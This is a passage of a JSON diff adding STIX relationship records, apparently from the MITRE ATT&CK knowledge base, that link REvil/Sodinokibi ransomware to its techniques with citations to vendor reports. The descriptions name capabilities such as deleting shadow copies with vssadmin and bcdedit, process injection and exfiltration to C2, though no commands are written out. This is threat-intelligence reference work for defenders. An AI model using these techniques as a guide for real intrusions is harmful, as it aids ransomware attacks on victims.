"relationship--31bf8ae4-e757-462c-aa30-c4a9dd92c677", + "type": "relationship", + "modified": "2020-08-14T15:20:58.310Z", + "created": "2020-08-04T16:03:24.329Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "external_references": [ + { + "source_name": "Kaspersky Sodin July 2019", + "url": "https://securelist.com/sodin-ransomware/91473/", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020." + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Talos Sodinokibi April 2019", + "url": "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee REvil October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", + "description": "Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 Crescendo. Retrieved August 5, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can encrypt files on victim systems and demands a ransom to decrypt the files.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee REvil October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--1c30f3e0-f621-4e59-934d-f4091cb9eca5", + "type": "relationship", + "modified": "2020-08-14T15:20:58.333Z", + "created": "2020-08-04T16:03:24.341Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "external_references": [ + { + "source_name": "Kaspersky Sodin July 2019", + "url": "https://securelist.com/sodin-ransomware/91473/", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020." + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has the ability to identify specific files and directories that are not to be encrypted.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--74972bfd-6910-4602-8327-5cc6db07e48a", + "type": "relationship", + "modified": "2020-08-14T15:20:58.420Z", + "created": "2020-08-04T16:03:24.327Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "external_references": [ + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Talos Sodinokibi April 2019", + "url": "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can use the Windows command line to delete volume shadow copies and disable recovery.(Citation: Cylance Sodinokibi July 2019)(Citation: Talos Sodinokibi April 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--1caa0b51-4e91-4c1b-bec5-53592ab9d08a", + "type": "relationship", + "modified": "2020-08-05T19:18:46.739Z", + "created": "2020-08-04T19:13:49.954Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161", + "external_references": [ + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has used HTTP and HTTPS in communication with C2.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--bb231cc6-fa7f-411f-9ec8-392572474e57", + "type": "relationship", + "modified": "2020-08-05T19:35:40.025Z", + "created": "2020-08-04T19:13:49.950Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4", + "external_references": [ + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can save encryption parameters and system information to the Registry.(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--2c927351-d98a-4734-83db-82ad3231e59f", + "type": "relationship", + "modified": "2020-08-05T19:35:40.027Z", + "created": "2020-08-04T19:13:49.965Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", + "external_references": [ + { + "source_name": "Kaspersky Sodin July 2019", + "url": "https://securelist.com/sodin-ransomware/91473/", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020." + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "Talos Sodinokibi April 2019", + "url": "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can use vssadmin to delete volume shadow copies and bcdedit to disable recovery features.(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Intel 471 REvil March 2020)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--e8924eab-e270-43ed-8d7b-8e14cb739720", + "type": "relationship", + "modified": "2020-08-14T15:20:58.442Z", + "created": "2020-08-04T19:13:50.025Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579", + "external_references": [ + { + "source_name": "Cylance Sodinokibi July 2019", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can connect to and disable the Symantec server on the victim's network.(Citation: Cylance Sodinokibi July 2019)", + "relationship_type": "uses", + "id": "relationship--221d9c96-0042-4354-8475-4cc7d0437254", + "type": "relationship", + "modified": "2020-08-04T19:13:50.028Z", + "created": "2020-08-04T19:13:50.028Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "external_references": [ + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "Talos Sodinokibi April 2019", + "url": "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Group IB Ransomware May 2020", + "url": "https://www.group-ib.com/whitepapers/ransomware-uncovered.html", + "description": "Group IB. (2020, May). Ransomware Uncovered: Attackers\u2019 Latest Methods. Retrieved August 5, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has used PowerShell to delete volume shadow copies and download files.(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)", + "relationship_type": "uses", + "id": "relationship--23bd8751-1083-4c0b-8ec1-b5f637c5fbc7", + "type": "relationship", + "modified": "2020-08-05T17:04:56.136Z", + "created": "2020-08-04T19:38:36.952Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "external_references": [ + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020." + }, + { + "source_name": "Group IB Ransomware May 2020", + "url": "https://www.group-ib.com/whitepapers/ransomware-uncovered.html", + "description": "Group IB. (2020, May). Ransomware Uncovered: Attackers\u2019 Latest Methods. Retrieved August 5, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can use WMI to monitor for and kill specific processes listed in its configuration file.(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Group IB Ransomware May 2020)", + "relationship_type": "uses", + "id": "relationship--9e80392b-1b7c-4e82-9fbf-73d8ddb6b876", + "type": "relationship", + "modified": "2020-08-05T17:04:56.127Z", + "created": "2020-08-04T19:38:36.963Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "external_references": [ + { + "source_name": "Talos Sodinokibi April 2019", + "url": "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html", + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020." + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + }, + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can download a copy of itself from an attacker controlled IP address to the victim machine.(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: Picus Sodinokibi January 2020)", + "relationship_type": "uses", + "id": "relationship--a910e0f8-1548-4dd6-a0eb-19430a5f75b0", + "type": "relationship", + "modified": "2020-08-05T17:26:24.805Z", + "created": "2020-08-04T19:50:07.535Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d", + "external_references": [ + { + "source_name": "McAfee Sodinokibi October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 What The Code Tells Us. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can obtain the token from the user that launched the explorer.exe process to avoid affecting the desktop of the SYSTEM user.(Citation: McAfee Sodinokibi October 2019)", + "relationship_type": "uses", + "id": "relationship--bab712d9-69d6-49d0-b063-8f957f3ea222", + "type": "relationship", + "modified": "2020-08-04T20:12:10.732Z", + "created": "2020-08-04T20:12:10.732Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "external_references": [ + { + "source_name": "McAfee REvil October 2019", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/", + "description": "Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service \u2013 Crescendo. Retrieved August 5, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can inject itself into running processes on a compromised host.(Citation: McAfee REvil October 2019)", + "relationship_type": "uses", + "id": "relationship--2c66270f-e6eb-4f0b-9006-9be7fcc9ba3a", + "type": "relationship", + "modified": "2020-08-05T14:30:34.357Z", + "created": "2020-08-05T14:30:34.357Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "external_references": [ + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can mark its binary code for deletion after reboot.(Citation: Intel 471 REvil March 2020)", + "relationship_type": "uses", + "id": "relationship--e73e1a22-4923-404b-b2f2-5131f8f24e64", + "type": "relationship", + "modified": "2020-08-05T15:09:37.746Z", + "created": "2020-08-05T15:09:37.746Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b", + "external_references": [ + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + }, + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) has the capability to stop services and kill processes.(Citation: Intel 471 REvil March 2020)(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--50900340-6edc-447c-aa1c-f73f5d72e4c6", + "type": "relationship", + "modified": "2020-08-05T19:18:46.763Z", + "created": "2020-08-05T15:09:37.748Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "external_references": [ + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can enumerate active services.(Citation: Intel 471 REvil March 2020)", + "relationship_type": "uses", + "id": "relationship--965cdcbc-f139-4065-a8cd-ab09674ae20b", + "type": "relationship", + "modified": "2020-09-22T18:11:12.439Z", + "created": "2020-08-05T15:09:37.751Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "external_references": [ + { + "source_name": "Picus Sodinokibi January 2020", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can mimic the names of known executables.(Citation: Picus Sodinokibi January 2020)", + "relationship_type": "uses", + "id": "relationship--2c8a4c1a-0faf-444d-a6b2-556c55374fa2", + "type": "relationship", + "modified": "2020-08-05T17:26:24.486Z", + "created": "2020-08-05T17:26:24.486Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + }, + { + "source_name": "Intel 471 REvil March 2020", + "url": "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service \u2013 An analysis of a ransomware affiliate operation. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can use Native API for execution and to retrieve active services.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)", + "relationship_type": "uses", + "id": "relationship--63131350-3239-4272-a155-5d50e174b1e3", + "type": "relationship", + "modified": "2020-08-05T19:18:46.563Z", + "created": "2020-08-05T19:18:46.563Z" + }, + { + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "external_references": [ + { + "source_name": "Secureworks REvil September 2019", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020." + } + ], + "description": "[REvil](https://attack.mitre.org/software/S0496) can exfiltrate host and malware information to C2 servers.(Citation: Secureworks REvil September 2019)", + "relationship_type": "uses", + "id": "relationship--4f32ce54-46cf-4141-9700-9978056951db", + "type": "relationship", + "modified": 